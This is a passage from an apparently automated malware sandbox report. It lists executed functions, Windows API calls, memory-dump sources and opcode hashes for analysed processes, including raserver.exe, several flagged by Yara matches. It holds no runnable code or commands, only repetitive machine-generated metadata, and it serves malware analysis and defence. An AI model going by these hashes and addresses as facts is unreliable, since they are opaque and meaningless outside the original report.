                                                              • RTL: Re-Waiting, xrefs: 00AA24FA
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                              • API String ID: 0-3177188983
                                                              • Opcode ID: 3027f4730e28788b4e5bdaff0af2008c4e52aa1852825e821c44ea06e2aa128d
                                                              • Instruction ID: a9617e94e8cd553535f009ceadff3816f547e7db78c8739b9d94108c324ab5e5
                                                              • Opcode Fuzzy Hash: 3027f4730e28788b4e5bdaff0af2008c4e52aa1852825e821c44ea06e2aa128d
                                                              • Instruction Fuzzy Hash: 4541F375A00304BFCB24EB68CD85FAA77B8EF89720F208615F5559B2C1D734E95187A1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A7FCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: __fassign
                                                              • String ID:
                                                              • API String ID: 3965848254-0
                                                              • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                              • Instruction ID: d320c53a9a8fa5328728e580ca10bc981a117142d8afb24f24fe5635d5ed1fc2
                                                              • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                              • Instruction Fuzzy Hash: CE915A31E0020AEFDF28DF98CC456AEB7B4EB55314F24C47AD419A72A2E7305B85CB95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A7FE4F, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00A7FED6: ___swprintf_l.LIBCMT ref: 00A7FEFD
                                                              • ___swprintf_l.LIBCMT ref: 00AAEA87
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u$j5_t
                                                              • API String ID: 48624451-2675202035
                                                              • Opcode ID: 97ee66e90f442687a557860d665f35263fc8ff6172944f6da33512c2f1cfc83f
                                                              • Instruction ID: 60f15ac92ae0c3f0aa7c4b78a6f7f3b97b7656781985d60f548671817ac4b4bf
                                                              • Opcode Fuzzy Hash: 97ee66e90f442687a557860d665f35263fc8ff6172944f6da33512c2f1cfc83f
                                                              • Instruction Fuzzy Hash: A0117F76500219AFCB10EFA8CD509BBB7B8AB54700B54892AF949D7152EB30AA14CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Analysis Process: raserver.exe PID: 1892 Parent PID: 2412 raserver.exeCOMMON

                                                              Executed Functions

                                                              Function 000DA360, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtCreateFile.NTDLL(00000060,00000000,.z`,000D4BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000D4BB7,007A002E,00000000,00000060,00000000,00000000), ref: 000DA3AD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID: .z`
                                                              • API String ID: 823142352-1441809116
                                                              • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                              • Instruction ID: 2cf0fd6d45c5413c73f76456fb2362dfc31e7dfabd6e80247b9f9572b117baf0
                                                              • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                              • Instruction Fuzzy Hash: C1F0BDB2200208ABCB08CF88DC85EEB77ADEF8C754F158248BA0D97241C630E8118BA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000DA40A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37filenativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1J,FFFFFFFF,?,rM,?,00000000), ref: 000DA455
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID: 1J
                                                              • API String ID: 2738559852-2932837767
                                                              • Opcode ID: 3b64409855d51beab7a2484172b630d8b035c7d66292ae0b4cfa7e96f7101326
                                                              • Instruction ID: a970249c29711b3f2c798050d51e2b80851bbefdbe87d5ab8db3f829dedc3c3b
                                                              • Opcode Fuzzy Hash: 3b64409855d51beab7a2484172b630d8b035c7d66292ae0b4cfa7e96f7101326
                                                              • Instruction Fuzzy Hash: BFF0F4B2200208ABCB14DF88DC80EEB77A9EF8C754F158658BE0DA7241C630ED11CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000DA410, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1J,FFFFFFFF,?,rM,?,00000000), ref: 000DA455
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID: 1J
                                                              • API String ID: 2738559852-2932837767
                                                              • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                              • Instruction ID: b8dcda35654d662fdec0f780c5e06c6bc8c4e237612b22b272518d9ea63c0ac1
                                                              • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                              • Instruction Fuzzy Hash: E4F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158259BE1D97241D630E811CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000DA490, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtClose.NTDLL(PM,?,?,000D4D50,00000000,FFFFFFFF), ref: 000DA4B5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID: PM
                                                              • API String ID: 3535843008-2828778071
                                                              • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                              • Instruction ID: 78b2371570d793dcaf4ae20e4098aae7a77940f79cae71c1ec23baa99d6a3e0d
                                                              • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                              • Instruction Fuzzy Hash: A2D012752003146BD710EBD8CC45ED7775CEF45750F154495BA185B242C530F50086E0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000DA53C, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,000C2D11,00002000,00003000,00000004), ref: 000DA579
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: 73c67fecdb17961c11ed84289770de546856e7ddf6712c32a9059fd093956411
                                                              • Instruction ID: aff31bfb32b683c84bc248eed6492b27a835fc01f4721b7fe056350759fee4ff
                                                              • Opcode Fuzzy Hash: 73c67fecdb17961c11ed84289770de546856e7ddf6712c32a9059fd093956411
                                                              • Instruction Fuzzy Hash: 1CF015B6210208AFDB18DF89CC81EEB77ADEF88754F158159FE1897242C631E911CBB0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000DA540, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,000C2D11,00002000,00003000,00000004), ref: 000DA579
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                              • Instruction ID: 08c289582268a2eed93c454545761e589863713c2ad6a1f8d0d8c570d090b4bc
                                                              • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                              • Instruction Fuzzy Hash: ADF015B2200208ABCB14DF89CC81EEB77ADEF88754F158159BE0897241C630F810CBB0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01EC00C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.665945266.0000000001EB0000.00000040.00000001.sdmp, Offset: 01EA0000, based on PE: true
                                                              • Associated: 00000006.00000002.665938551.0000000001EA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666041714.0000000001F90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666052467.0000000001FA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666063534.0000000001FA4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666081748.0000000001FA7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666114112.0000000001FB0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666168843.0000000002010000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                              • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                              • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                              • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01EC07AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.665945266.0000000001EB0000.00000040.00000001.sdmp, Offset: 01EA0000, based on PE: true
                                                              • Associated: 00000006.00000002.665938551.0000000001EA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666041714.0000000001F90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666052467.0000000001FA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666063534.0000000001FA4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666081748.0000000001FA7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666114112.0000000001FB0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666168843.0000000002010000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                              • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                              • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                              • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01EBF9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.665945266.0000000001EB0000.00000040.00000001.sdmp, Offset: 01EA0000, based on PE: true
                                                              • Associated: 00000006.00000002.665938551.0000000001EA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666041714.0000000001F90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666052467.0000000001FA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666063534.0000000001FA4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666081748.0000000001FA7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666114112.0000000001FB0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666168843.0000000002010000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                              • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                              • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                              • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01EBF900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.665945266.0000000001EB0000.00000040.00000001.sdmp, Offset: 01EA0000, based on PE: true
                                                              • Associated: 00000006.00000002.665938551.0000000001EA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666041714.0000000001F90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666052467.0000000001FA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666063534.0000000001FA4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666081748.0000000001FA7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666114112.0000000001FB0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666168843.0000000002010000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                              • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                              • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                              • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01EBFBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.665945266.0000000001EB0000.00000040.00000001.sdmp, Offset: 01EA0000, based on PE: true
                                                              • Associated: 00000006.00000002.665938551.0000000001EA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666041714.0000000001F90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666052467.0000000001FA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666063534.0000000001FA4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666081748.0000000001FA7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666114112.0000000001FB0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666168843.0000000002010000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                              • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                              • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                              • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01EBFB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.665945266.0000000001EB0000.00000040.00000001.sdmp, Offset: 01EA0000, based on PE: true
                                                              • Associated: 00000006.00000002.665938551.0000000001EA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666041714.0000000001F90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666052467.0000000001FA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666063534.0000000001FA4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666081748.0000000001FA7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666114112.0000000001FB0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666168843.0000000002010000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                              • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                              • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                              • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01EBFB50, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.665945266.0000000001EB0000.00000040.00000001.sdmp, Offset: 01EA0000, based on PE: true
                                                              • Associated: 00000006.00000002.665938551.0000000001EA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666041714.0000000001F90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666052467.0000000001FA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666063534.0000000001FA4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666081748.0000000001FA7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666114112.0000000001FB0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666168843.0000000002010000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                              • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                              • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                              • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01EBFAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.665945266.0000000001EB0000.00000040.00000001.sdmp, Offset: 01EA0000, based on PE: true
                                                              • Associated: 00000006.00000002.665938551.0000000001EA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666041714.0000000001F90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666052467.0000000001FA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666063534.0000000001FA4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666081748.0000000001FA7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666114112.0000000001FB0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666168843.0000000002010000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                              • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                              • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                              • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01EBFAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.665945266.0000000001EB0000.00000040.00000001.sdmp, Offset: 01EA0000, based on PE: true
                                                              • Associated: 00000006.00000002.665938551.0000000001EA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666041714.0000000001F90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666052467.0000000001FA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666063534.0000000001FA4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666081748.0000000001FA7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666114112.0000000001FB0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666168843.0000000002010000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                              • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                              • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                              • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01EBFAB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.665945266.0000000001EB0000.00000040.00000001.sdmp, Offset: 01EA0000, based on PE: true
                                                              • Associated: 00000006.00000002.665938551.0000000001EA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666041714.0000000001F90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666052467.0000000001FA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666063534.0000000001FA4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666081748.0000000001FA7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666114112.0000000001FB0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666168843.0000000002010000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                              • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                              • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                              • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01EBFDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.665945266.0000000001EB0000.00000040.00000001.sdmp, Offset: 01EA0000, based on PE: true
                                                              • Associated: 00000006.00000002.665938551.0000000001EA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666041714.0000000001F90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666052467.0000000001FA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666063534.0000000001FA4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666081748.0000000001FA7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666114112.0000000001FB0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666168843.0000000002010000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                              • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                              • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                              • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01EBFD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.665945266.0000000001EB0000.00000040.00000001.sdmp, Offset: 01EA0000, based on PE: true
                                                              • Associated: 00000006.00000002.665938551.0000000001EA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666041714.0000000001F90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666052467.0000000001FA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666063534.0000000001FA4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666081748.0000000001FA7000.00000040.00000001.sdmp Download File
